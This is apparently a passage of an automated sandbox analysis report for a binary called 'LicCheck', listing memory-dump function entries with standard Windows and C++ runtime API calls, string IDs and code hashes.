                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: ,}$,}$,}$,}$,}$bad locale name$false$true
                                                                                                    • API String ID: 3559308103-3624877754
                                                                                                    • Opcode ID: 55904ca38fa2c0c2b6777159cd97788a32a4ff1a3fe88838c375cd2bc5c95b69
                                                                                                    • Instruction ID: fa9f8ab528eb01a055fdbdb83418c7a8ea8a1699742aae53cc0fa5e12c081b3e
                                                                                                    • Opcode Fuzzy Hash: 55904ca38fa2c0c2b6777159cd97788a32a4ff1a3fe88838c375cd2bc5c95b69
                                                                                                    • Instruction Fuzzy Hash: E37190B0D01348DBEF10DFA8D84979EBBB4AF45300F14411DE915A7382E7BEAA05CBA1
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798BB6
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798BD8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798BF8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798C1F
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00798C98
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00798CE4
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00798CFE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00798D93
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00798DA0
                                                                                                      • Part of subcall function 007A41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A41DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                     • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
                                                                                                     • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: ,}$,}$bad locale name
                                                                                                    • API String ID: 1592514138-93938261
                                                                                                    • Opcode ID: 847ff295aaabe899a11f48ef2df85631420ca0963af9f1516afacab05ad830f8
                                                                                                    • Instruction ID: 774eaae693ed5a4e7166f70d6f101b7897920d2c23eaff96ea30dda989d4067a
                                                                                                    • Opcode Fuzzy Hash: 847ff295aaabe899a11f48ef2df85631420ca0963af9f1516afacab05ad830f8
                                                                                                    • Instruction Fuzzy Hash: 0F618FB0D01248DFDF50DFA4E885B9EBBB4BF56310F144559E805A7382EB7DA904CBA1
APIs
• _ValidateLocalCookies.LIBCMT ref: 007A6697
• ___except_validate_context_record.LIBVCRUNTIME ref: 007A669F
• _ValidateLocalCookies.LIBCMT ref: 007A6728
• __IsNonwritableInCurrentImage.LIBCMT ref: 007A6753
• _ValidateLocalCookies.LIBCMT ref: 007A67A8
Strings
Memory Dump Source
• Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
• Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: 0'y$Sdz$csm
• API String ID: 1170836740-3815073844
APIs
• type_info::operator==.LIBVCRUNTIME ref: 007A8C29
• ___TypeMatch.LIBVCRUNTIME ref: 007A8D37
• _UnwindNestedFrames.LIBCMT ref: 007A8E89
• CallUnexpected.LIBVCRUNTIME ref: 007A8EA4
Strings
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2751267872-393685449
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00793663
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 007936AF
• __Getctype.LIBCPMT ref: 007936C8
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 007936E4
• std::_Lockit::~_Lockit.LIBCPMT ref: 00793779
Strings
Similarity
• API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: ,}$bad locale name
• API String ID: 1840309910-3579276375
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00798E06
• std::_Lockit::_Lockit.LIBCPMT ref: 00798E29
• std::_Lockit::~_Lockit.LIBCPMT ref: 00798E49
• std::_Facet_Register.LIBCPMT ref: 00798EBB
• std::_Lockit::~_Lockit.LIBCPMT ref: 00798ED3
• Concurrency::cancel_current_task.LIBCPMT ref: 00798EF6
Strings
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID: ,}
• API String ID: 2081738530-828428382
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0079D9FD
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0079DA50
• __Getcoll.LIBCPMT ref: 0079DA62
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0079DA81
• std::_Lockit::~_Lockit.LIBCPMT ref: 0079DB16
Strings
Similarity
• API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 1629477862-1405518554
APIs
• std::locale::_Init.LIBCPMT ref: 0079D045
  • Part of subcall function 007A4400: __EH_prolog3.LIBCMT ref: 007A4407
  • Part of subcall function 007A4400: std::_Lockit::_Lockit.LIBCPMT ref: 007A4412
  • Part of subcall function 007A4400: std::locale::_Setgloballocale.LIBCPMT ref: 007A442D
  • Part of subcall function 007A4400: _Yarn.LIBCPMT ref: 007A4443
  • Part of subcall function 007A4400: std::_Lockit::~_Lockit.LIBCPMT ref: 007A4483
• std::_Lockit::_Lockit.LIBCPMT ref: 0079D05C
• std::_Lockit::_Lockit.LIBCPMT ref: 0079D07E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0079D09E
• std::_Lockit::~_Lockit.LIBCPMT ref: 0079D0CC
• std::_Facet_Register.LIBCPMT ref: 0079D143
• Concurrency::cancel_current_task.LIBCPMT ref: 0079D15D
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$Concurrency::cancel_current_taskFacet_H_prolog3InitRegisterSetgloballocaleYarn
• String ID:
• API String ID: 298508500-0
APIs
• FreeLibrary.KERNEL32(00000000,?,007B4F91,00792EE7,?,?,00000000,?,?,007B51BB,00000021,FlsSetValue,007C9450,007C9458,?), ref: 007B4F45
Strings
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,61DA755C,00792904,?,00000000,007C36F0,000000FF,?,007AFF03,8B56C18B,?,007AFED7,00000016), ref: 007AFFA8
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007AFFBA
• FreeLibrary.KERNEL32(00000000,?,00000000,007C36F0,000000FF,?,007AFF03,8B56C18B,?,007AFED7,00000016), ref: 007AFFDC
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: 0'y$CorExitProcess$mscoree.dll
• API String ID: 4061214504-3345235888
APIs
Similarity
• API ID: __freea$Info
• String ID:
• API String ID: 541289543-0
APIs
• GetCPInfo.KERNEL32(?,?), ref: 007A4F92
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007A5020
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A5092
• MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 007A50AC
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007A510F
• CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 007A512C
Similarity
• API ID: ByteCharMultiWide$CompareInfoString
• String ID:
• API String ID: 2984826149-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 007A4D66
• MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 007A4DD1
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A4DEE
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 007A4E2D
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007A4E8C
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 007A4EAF
Similarity
• API ID: ByteCharMultiStringWide
• String ID:
• API String ID: 2829165498-0
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00798796
• std::_Lockit::_Lockit.LIBCPMT ref: 007987B9
• std::_Lockit::~_Lockit.LIBCPMT ref: 007987D9
• std::_Facet_Register.LIBCPMT ref: 0079884B
• std::_Lockit::~_Lockit.LIBCPMT ref: 00798863
• Concurrency::cancel_current_task.LIBCPMT ref: 00798886
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2081738530-0
APIs
Similarity
• API ID: _strcspn
• String ID: [fy$}$}
• API String ID: 3709121408-1950649321
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0079D1FB
• std::_Lockit::_Lockit.LIBCPMT ref: 0079D220
• std::_Lockit::~_Lockit.LIBCPMT ref: 0079D240
• std::_Lockit::~_Lockit.LIBCPMT ref: 0079D271
• std::_Facet_Register.LIBCPMT ref: 0079D2E6
• Concurrency::cancel_current_task.LIBCPMT ref: 0079D300
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
• String ID:
• API String ID: 2081738530-0
APIs
• GetLastError.KERNEL32(?,?,007A8793,007A65FF,007A5D1C), ref: 007A87AA
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007A87B8
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007A87D1
• SetLastError.KERNEL32(00000000,007A8793,007A65FF,007A5D1C), ref: 007A8823
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
Similarity
• API ID: AdjustPointer
• String ID: 0'y
• API String ID: 1740715915-674645887
APIs
  • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
  • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
• GetCurrentProcessId.KERNEL32(00000000,?,61DA755C), ref: 007941E5
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0079429A
  • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
  • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
  • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
  • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
Similarity
• API ID: Lockitstd::_$InitLockit::_Lockit::~_std::locale::_$CurrentIos_base_dtorProcessstd::ios_base::_
• String ID: `$}$}
• API String ID: 1043075861-513913037
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B58AB
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B58BE
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: V{$V{
• API String ID: 885266447-4053932452
                                                                                                    • Opcode ID: 256ff387539f1010bf5c0acab90b8cdf6643e990068d28c3f329292f4dc08f2c
                                                                                                    • Instruction ID: ca978870d7c747205d9f59878276ba2a5d880ea69bf27bca3793973ef81b47ed
                                                                                                    • Opcode Fuzzy Hash: 256ff387539f1010bf5c0acab90b8cdf6643e990068d28c3f329292f4dc08f2c
                                                                                                    • Instruction Fuzzy Hash: C1515C71E00649EFCF14DF98C891BEEBBB2EB89310F188159E955AB351D738AD42CB50
                                                                                                    APIs
                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00793ABF
                                                                                                      • Part of subcall function 007A691B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,007A418F,?,007D3B78,00792904,string too long,00792904,?,?,?), ref: 007A697B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                    • Opcode ID: 81e3d4498819990875a66a767802ffad174d0aedd8ff05f921ddb8ab7822221a
                                                                                                    • Instruction ID: fca80e9cefbe0df5d1f9b3a8ff9b8fe12cc806ce4bde36f146e40d36de131575
                                                                                                    • Opcode Fuzzy Hash: 81e3d4498819990875a66a767802ffad174d0aedd8ff05f921ddb8ab7822221a
                                                                                                    • Instruction Fuzzy Hash: 8411D5B2910704ABCB10DF59E845F9AB3E8EF45310F18863EF99897241F779BA148BD1
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,007A9893,00000000,?,007D67D4,?,?,?,007A9A36,00000004,InitializeCriticalSectionEx,007C7190,InitializeCriticalSectionEx), ref: 007A98EF
                                                                                                    • GetLastError.KERNEL32(?,007A9893,00000000,?,007D67D4,?,?,?,007A9A36,00000004,InitializeCriticalSectionEx,007C7190,InitializeCriticalSectionEx,00000000,?,007A97ED), ref: 007A98F9
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 007A9921
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                    • Opcode ID: d61b547cc48cade27ee0cc11d1418bf64b7ccfefdbc5752b75760e7b9a467b3b
                                                                                                    • Instruction ID: 5b1c1eb5d966aa99052152e4191aa54c1415d404d5ccd5f88f0e10263c4704e1
                                                                                                    • Opcode Fuzzy Hash: d61b547cc48cade27ee0cc11d1418bf64b7ccfefdbc5752b75760e7b9a467b3b
                                                                                                    • Instruction Fuzzy Hash: 22E04870640208B7DF101B61DC0AFDA3B549B85B50F158468FA0CE40E0D76AF8A0D5C4
                                                                                                    APIs
                                                                                                    • GetConsoleOutputCP.KERNEL32(61DA755C,00000000,00000000,00000000), ref: 007B2C7B
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007B2ED6
                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 007B2F1E
                                                                                                    • GetLastError.KERNEL32 ref: 007B2FC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2112829910-0
                                                                                                    • Opcode ID: 4271aee0a9445fa862b3c73fc8e537046a954a3c7e72062bba40c453b29951dc
                                                                                                    • Instruction ID: 65aecdf820617884cbf4ade752533852ba4159b58ef48d81f89ae0150f0d0f5c
                                                                                                    • Opcode Fuzzy Hash: 4271aee0a9445fa862b3c73fc8e537046a954a3c7e72062bba40c453b29951dc
                                                                                                    • Instruction Fuzzy Hash: 9BD15BB5E012589FCB15CFA8D884AEDBBB4FF48300F28452AE855E7352D734A942CB60
                                                                                                    APIs
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • GetLastError.KERNEL32 ref: 007B9F61
                                                                                                    • __dosmaperr.LIBCMT ref: 007B9F68
                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 007B9FA2
                                                                                                    • __dosmaperr.LIBCMT ref: 007B9FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1913693674-0
                                                                                                    • Opcode ID: 6845cba103611f712746a4fd06124af2a091a5f19dcfacb2bb6282cd1a968004
                                                                                                    • Instruction ID: 8b40c593a9a945fa45a58d75d5be7c49703aeed80c64b9dd5f5f48ac5a162d2f
                                                                                                    • Opcode Fuzzy Hash: 6845cba103611f712746a4fd06124af2a091a5f19dcfacb2bb6282cd1a968004
                                                                                                    • Instruction Fuzzy Hash: 9C218071604615EF9B10AF65C884EBBBBA9FF453747108618FB29D7251E738EC408BA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8da1d299b83ef99830077aa75932ceaea627b4e14433b85770e58f1cb10afcb
                                                                                                    • Instruction ID: 94c4b87227183acdabad28a104cff1043f93e99fb2b8c5f340c3cb58a61f74be
                                                                                                    • Opcode Fuzzy Hash: b8da1d299b83ef99830077aa75932ceaea627b4e14433b85770e58f1cb10afcb
                                                                                                    • Instruction Fuzzy Hash: 9321D132600209EF9B24AFB0CC8496BB7A9FF92364B108738F815C7141E738EC4187A0
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 007BAE9B
                                                                                                      • Part of subcall function 007B9AE1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,007B8296,?,00000000,-00000008), ref: 007B9B8D
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BAED3
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BAEF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 158306478-0
                                                                                                    • Opcode ID: 1f37d851e312619bde4c8f521b79e29b01003a02060709f36a080c9a082515d1
                                                                                                    • Instruction ID: 2a00abed60a8a7055a23afad76725cb70682eec7188a91bbb3c3529f78c08083
                                                                                                    • Opcode Fuzzy Hash: 1f37d851e312619bde4c8f521b79e29b01003a02060709f36a080c9a082515d1
                                                                                                    • Instruction Fuzzy Hash: 3D11A1F1505615BE661137B16CCEEFF7E6CDE883943204119F501D1101FB2DDE8185B2
                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000), ref: 007C1D5E
                                                                                                    • GetLastError.KERNEL32(?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000,00000000,?,007B35D3,00000000), ref: 007C1D6A
                                                                                                      • Part of subcall function 007C1D30: CloseHandle.KERNEL32(FFFFFFFE,007C1D7A,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000,00000000), ref: 007C1D40
                                                                                                    • ___initconout.LIBCMT ref: 007C1D7A
                                                                                                      • Part of subcall function 007C1CF2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,007C1D21,007BE20F,00000000,?,007B3015,00000000,00000000,00000000,00000000), ref: 007C1D05
                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,007BE222,00000000,00000001,00000000,00000000,?,007B3015,00000000,00000000,00000000,00000000), ref: 007C1D8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    • API String ID: 2744216297-0
                                                                                                    • Opcode ID: 0269031b414c863d1df983fed1bb076b7b5a8e1ef7a5dea92e04cab96dfbdf75
                                                                                                    • Instruction ID: 0c06b247bea809d391bfa330de4cf490e932b1397943cfc8fd8c74b5e10f6303
                                                                                                    • Opcode Fuzzy Hash: 0269031b414c863d1df983fed1bb076b7b5a8e1ef7a5dea92e04cab96dfbdf75
                                                                                                    • Instruction Fuzzy Hash: DBF01236100525BBCF221F91DC08E9D3F26FF453A1F808128FD1D85521CA36D8A09B94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8Q}$8Q}
                                                                                                    • API String ID: 0-1212950194
                                                                                                    • Opcode ID: 3e741481c134a2c53d6c404328022dd19f9d19e851e102714403225061f4a083
                                                                                                    • Instruction ID: b3e8d732ddf2f99a72a40b317e3a0104e4e0b155e5adbcc9c26291b8e3020334
                                                                                                    • Opcode Fuzzy Hash: 3e741481c134a2c53d6c404328022dd19f9d19e851e102714403225061f4a083
                                                                                                    • Instruction Fuzzy Hash: 94C123B2D44204ABDB20DBA8CC86FDE77F8AF48740F154165FA05FB282D674DD418BA4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID: `v|$w|
                                                                                                    • API String ID: 1807457897-2088649157
                                                                                                    • Opcode ID: dcd4da3b7c7d64f72be294adf7873de2e0f9427aac355f1c0799643df732c561
                                                                                                    • Instruction ID: 0a6d10fd55bc5d930c865f920682f1aae8e9a67d6788d4567c42cc29da07f50c
                                                                                                    • Opcode Fuzzy Hash: dcd4da3b7c7d64f72be294adf7873de2e0f9427aac355f1c0799643df732c561
                                                                                                    • Instruction Fuzzy Hash: 40D1A0B1D00305DFDB11DF64C885BEEBBF5BF49300F144629E895AB242EB79A945CB60
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 007AEE0D
